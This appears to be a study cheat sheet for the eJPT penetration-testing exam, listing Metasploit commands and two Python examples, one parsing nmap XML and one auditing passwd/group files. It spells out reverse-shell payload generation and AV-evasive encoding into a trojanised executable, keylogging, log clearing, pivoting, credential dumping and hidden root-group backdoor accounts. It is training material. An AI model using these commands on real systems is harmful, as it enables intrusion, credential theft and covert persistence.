eJPT-CheatSheets
Bartosz Pokrywka
Useful info and commands for the eJPT certification exam
Metasploit components by engagement phase:
- Info gathering & Enumeration -> Aux Module
- Vuln Scanning -> Aux Module, Nessus
- Exploitation -> Exploit Modules & Payloads
- Post Exploitation -> Meterpreter
- Privilege Escalation -> Post Exploitation Modules, Meterpreter
- Maintaining Persistent Access -> Post Exploitation Modules
msfconsole starting command:
$ sudo service postgresql start && sudo msfconsole
Workspaces:
- Create: > workspace -a [name]
- Switch: > workspace [name]
- Delete: > workspace -d [name]
- Rename: > workspace -r <old> <new>
Save nmap output as XML with:
- -oX [name]
Import it into msfconsole:
> db_import /directory/where/you/saved/the/scan
Type "services" to check that the import worked.
Nmap can also be run from inside msfconsole:
> db_nmap -Pn -sV -O <IP> (plus any other nmap options)
Its results are imported into the msfconsole database automatically.
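To see what db_import actually pulls out of a -oX file, here is an added example (not from this cheat sheet) that parses a constructed nmap XML report and prints the host/port/service rows you would expect to find under "services" afterwards. The XML sample, the addresses and the product versions in it are made up.

```python
"""Parse an nmap -oX report into host/port/service rows, the same data that
`db_import` feeds into the msfconsole database. Added example, not part of the
cheat sheet; the sample report below is constructed, not a real scan."""
import xml.etree.ElementTree as ET

# Constructed sample in nmap's XML schema: one host up with two open ports and
# one closed port, one host down.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 10.0.0.0/30">
  <host>
    <status state="up"/>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="8.9p1"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open"/>
        <service name="http" product="Apache httpd" version="2.4.52"/>
      </port>
      <port protocol="tcp" portid="23">
        <state state="closed"/>
      </port>
    </ports>
  </host>
  <host>
    <status state="down"/>
    <address addr="10.0.0.6" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return (host, port, proto, state, service, product/version) tuples for
    every port reported on hosts that are up. Hosts that are down carry no
    port data and are skipped."""
    root = ET.fromstring(xml_text)
    rows = []
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        addr = addr_el.get("addr")
        for port in host.findall("./ports/port"):
            state = port.find("state").get("state")
            svc = port.find("service")
            name = svc.get("name", "") if svc is not None else ""
            info = ""
            if svc is not None:
                # nmap only emits product/version when -sV identified them
                info = " ".join(v for v in (svc.get("product"), svc.get("version")) if v)
            rows.append((addr, int(port.get("portid")), port.get("protocol"), state, name, info))
    return rows


def open_services(xml_text):
    """Only the open ports: the rows that matter for choosing the next module."""
    return [r for r in parse_nmap_xml(xml_text) if r[3] == "open"]


if __name__ == "__main__":
    for host, port, proto, state, name, info in open_services(SAMPLE_NMAP_XML):
        print(f"{host:<15} {port:>5}/{proto} {state:<6} {name:<8} {info}")
```

Point it at a real report by reading the file produced with -oX instead of SAMPLE_NMAP_XML; a host that shows up here but not in "services" means the import did not pick it up.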
- Create a workspace for the port scan.
- Use an aux module:
  > search portscan
  for example:
  > auxiliary/scanner/portscan/tcp
- Run the scan.
- Exploit the target.
Now perform a port scan from the meterpreter session on the target (PIVOTING):
- Open a shell session:
  > shell
- Enumerate the network interfaces of the compromised host.
- Add the route in meterpreter:
  > run autoroute -s [host]
- Background the session:
  > background
- Go back to the portscan module and set RHOSTS to the next target's IP.
- Scan the second target.
List the available payloads:
> msfvenom --list payloads
Example of creating a payload for a 64-bit Windows system:
> msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=IPADDRESS LPORT=PORT -f exe > destinationofpayload
- -a (architecture of the target system)
- -p (payload to use)
- -f (output format)
List the available formats:
> msfvenom --list formats
List the encoders:
> msfvenom --list encoders
Example of creating an encoded payload:
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=IPADDRESS LPORT=PORT -e x86/shikata_ga_nai -f exe > destinationofencodedpayload
You can raise the number of encoding iterations with:
- -i 10
Example with 10 iterations, using an existing executable (given with -x) as the template:
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=IPADDRESS LPORT=PORT -e x86/shikata_ga_nai -i 10 -f exe -x /Downloads/wrar602.exe > pathtosavethepayload
To keep the original functionality of the template executable, add this flag (may not work):
- -k
Prepackaged resource scripts:
> ls -al /usr/share/metasploit-framework/scripts/resource/
Example of a resource script that automates a multi/handler session:
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST ipaddress
set LPORT port
run
Save it as handler.rc. To use it:
> msfconsole -r handler.rc
Or directly from msfconsole:
msf6 > resource ~/PATH/TO/RESOURCE/FILE.rc
To export the commands you have run so far into a resource file:
msf6 > makerc ~/PATH/TO/SAVE/THE/RESOURCE/FILE.rc
TIP: when setting a payload's LHOST you can type your interface name (e.g. "eth0", "eth1") instead of the IP address. Much time saved...
You can run a command in a backgrounded session without interacting with it:
> sessions -C <command> -i <sessionID>
To upgrade a shell to a meterpreter session without the extra manual steps:
> sessions -u <sessionID>
Windows persistence with the persistence_service module:
> use exploit/windows/local/persistence_service
> set SESSION <ID>
> set LPORT <port>
> exploit
Then catch the callback with multi/handler:
> use exploit/multi/handler
> set LHOST <yourIP>
> set LPORT <port>
> exploit
Then reboot the target machine to check that the service comes back.
Reminder: the default RDP port is TCP 3389.
After gaining a session on the target, enable RDP with:
> use post/windows/manage/enable_rdp
> set SESSION <ID>
> run
In meterpreter session:
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
Event logs can be viewed with the Event Viewer.
To clear the event logs, use the meterpreter command:
> clearev
Note that clearing a log is itself logged: the Security log records event ID 1102 ("The audit log was cleared") and the System log event ID 104, so a cleared log is an indicator defenders look for.
Pivoting: use the meterpreter command:
> run autoroute -s IP/SubnetRange
Then use this module to scan ports through the route:
> use auxiliary/scanner/portscan/tcp (or syn, etc.)
Then go back to the meterpreter session and forward a local port to the internal host:
> portfwd add -l 1234 -p 80 -r <internalNetworkVictimIP>
Then scan the forwarded port with nmap:
> db_nmap -sS -sV -p 1234 localhost
Remember to switch the payload to a "bind" type when exploiting the internal host:
> set payload windows/meterpreter/bind_tcp
To upgrade a shell session to meterpreter session:
> sessions -u <ID>
Manual Linux enumeration (meterpreter first, then a shell):
> sysinfo
> getuid
> /bin/bash -i
> cat /etc/passwd
> groups root
> cat /etc/*issue
> uname -r
> uname -a
> ip a s
> netstat -antp
> ps aux
> env
Linux enumeration post modules (set SESSION <ID> for each):
> use post/linux/gather/enum_configs
> use post/linux/gather/enum_networks
> use post/linux/gather/enum_protections
> use post/linux/gather/enum_system
> use post/linux/gather/checkcontainer
> use post/linux/gather/checkvm
> use post/linux/gather/enum_users_history
> use post/linux/gather/hashdump
Credential-gathering and persistence modules:
- post/multi/gather/ssh_creds
- post/multi/gather/docker_creds
- post/linux/gather/hashdump
- post/linux/gather/ecryptfs_creds
- post/linux/gather/enum_psk
- post/linux/gather/enum_xchat
- post/linux/gather/phpmyadmin_credsteal
- post/linux/gather/pptpd_chap_secrets
- post/linux/manage/sshkey_persistence
After gaining root, create a new user with an inconspicuous name (e.g. "ftp" or "sysadmin", if it doesn't already exist):
> useradd -m ftp -s /bin/bash
> passwd ftp
Add it to the root group:
> usermod -aG root ftp
Make it blend in further by giving it a low, system-style UID:
> usermod -u 15 ftp
There are also complete persistence solutions packaged in the Metasploit framework:
> search platform:linux persistence
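From the defender's side, the user-creation steps above leave concrete traces in /etc/passwd and /etc/group. The following added example (not from this cheat sheet) audits constructed copies of those two files for exactly those indicators: a system-range UID with an interactive shell, supplementary membership in group root, and two accounts sharing a UID. The sample account names, UIDs and group memberships are made up; the UID threshold follows the Debian/Ubuntu convention.

```python
"""Audit /etc/passwd and /etc/group for the traces of the persistence technique
above: an extra account with an interactive shell, membership in group root, and
a low UID chosen to look like a system account. Added example, not part of the
cheat sheet; the sample file contents are constructed."""

# Constructed sample: the "ftp" entry mirrors the useradd/usermod sequence above
# (interactive shell, UID lowered to 15, added to group root).
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
ftp:x:15:1001::/home/ftp:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
"""
SAMPLE_GROUP = """root:x:0:ftp
daemon:x:1:
sudo:x:27:alice
ftp:x:1001:
"""

SYSTEM_UID_MAX = 999  # assumption: Debian/Ubuntu layout, UIDs below 1000 are system accounts
INTERACTIVE_SHELLS = {"/bin/bash", "/bin/sh", "/bin/dash", "/bin/zsh", "/usr/bin/bash", "/usr/bin/zsh"}


def parse_passwd(text):
    """Split passwd lines into dicts; the seven colon-separated fields are fixed."""
    users = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, uid, gid, _gecos, home, shell = line.split(":")
        users.append({"name": name, "uid": int(uid), "gid": int(gid), "home": home, "shell": shell})
    return users


def parse_group(text):
    """Map group name -> gid and list of supplementary members."""
    groups = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, gid, members = line.split(":")
        groups[name] = {"gid": int(gid), "members": [m for m in members.split(",") if m]}
    return groups


def audit(passwd_text, group_text):
    """Return (account, finding) pairs; each check corresponds to one step of the technique."""
    users = parse_passwd(passwd_text)
    groups = parse_group(group_text)
    findings = []
    # 1. Any account besides root with UID 0 is a second root.
    for u in users:
        if u["uid"] == 0 and u["name"] != "root":
            findings.append((u["name"], "uid 0 but not root"))
    # 2. System-range UID with an interactive shell (usermod -u 15 on a bash user).
    #    Genuine system accounts normally get nologin or a fixed helper like /bin/sync.
    for u in users:
        if u["uid"] <= SYSTEM_UID_MAX and u["name"] != "root" and u["shell"] in INTERACTIVE_SHELLS:
            findings.append((u["name"], f"system uid {u['uid']} with interactive shell {u['shell']}"))
    # 3. Supplementary membership in group root (usermod -aG root).
    for member in groups.get("root", {}).get("members", []):
        findings.append((member, "member of group root"))
    # 4. Two accounts sharing a UID: a hand-picked low UID can collide with an existing one.
    seen = {}
    for u in users:
        if u["uid"] in seen:
            findings.append((u["name"], f"uid {u['uid']} also used by {seen[u['uid']]}"))
        seen.setdefault(u["uid"], u["name"])
    return findings


if __name__ == "__main__":
    for account, finding in audit(SAMPLE_PASSWD, SAMPLE_GROUP):
        print(f"{account}: {finding}")
```

On a live host, feed audit() the contents of the real /etc/passwd and /etc/group; comparing its output against a baseline taken before the engagement shows which accounts were added or modified.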
Using an SSH key (e.g. one obtained with the modules above):
> chmod 0400 ssh_key
> ssh -i ssh_key root@<targetIP>